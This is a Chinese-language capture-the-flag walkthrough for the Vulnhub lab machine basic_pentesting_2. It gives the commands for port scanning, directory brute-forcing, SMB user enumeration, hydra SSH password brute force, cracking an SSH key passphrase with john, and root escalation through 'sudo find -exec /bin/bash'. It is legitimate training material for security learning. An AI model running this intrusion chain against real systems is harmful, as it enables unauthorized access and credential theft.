Vulnhub靶机：basic_pentesting_2

一、介绍

运行环境：Virtualbox

攻击机：kali（10.0.2.4）

靶机：basic_pentesting_2（10.0.2.7）

目标：获取靶机root权限和flag

靶机下载地址：https://download.vulnhub.com/basicpentesting/basic_pentesting_2.tar.gz

二、信息收集

使用nmap主机发现靶机ip：10.0.2.7

使用nmap端口扫描发现靶机开放端口：22、80、139、445、8009、8080

nmap -A 10.0.2.7 -p 1-65535

80端口：打开网站未发现可利用的功能点

使用gobuster工具进行目录爆破，发现一个目录/development/

gobuster dir -u http://10.0.2.7/ -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

访问发现提示信息

J用户一直在审核 /etc/shadow 的内容

K用户的密码是弱口令

445端口：靶机开放了445端口，可以使用enum4linux工具枚举smb服务的信息，发现两个用户名：kay、jan

enum4linux -a -o 10.0.2.7 

三、漏洞利用

根据之前的提示，使用hydra工具爆破jan用户的ssh密码，得到：jan:armando

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.0.2.7:22 -t 64 

ssh登录

四、提权

查看是否存在特权命令，或是否存在具有root权限的可利用的可执行文件，均未发现

翻一翻各个文件夹，发现/home/kay/目录存在pass.bak文件，但目前我们没有访问权限；发现可以访问kay用户的ssh私钥文件

我们可以将私钥文件的内容复制到本地下来，设置权限：chmod 600 id_rsa

然后尝试使用私钥文件登录目标：ssh -i id_rsa kay@10.0.2.7

通过ssh2john转换id_rsa为可以识别的信息，然后利用字典解密该信息，来获取文件密码。

ssh2john id_rsa > passwd.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwd.txt

破解成功获得密码：beeswax

登录ssh成功

查看pass.bak文件：heresareallystrongpasswordthatfollowsthepasswordpolicy$$

这个可能是kay用户的密码，尝试使用命令sudo -l查看一下具有sudo权限的程序，输入密码成功

可以使用sudo提权，用find的exec参数来执行命令。

sudo find /home -exec /bin/bash \;

获取flag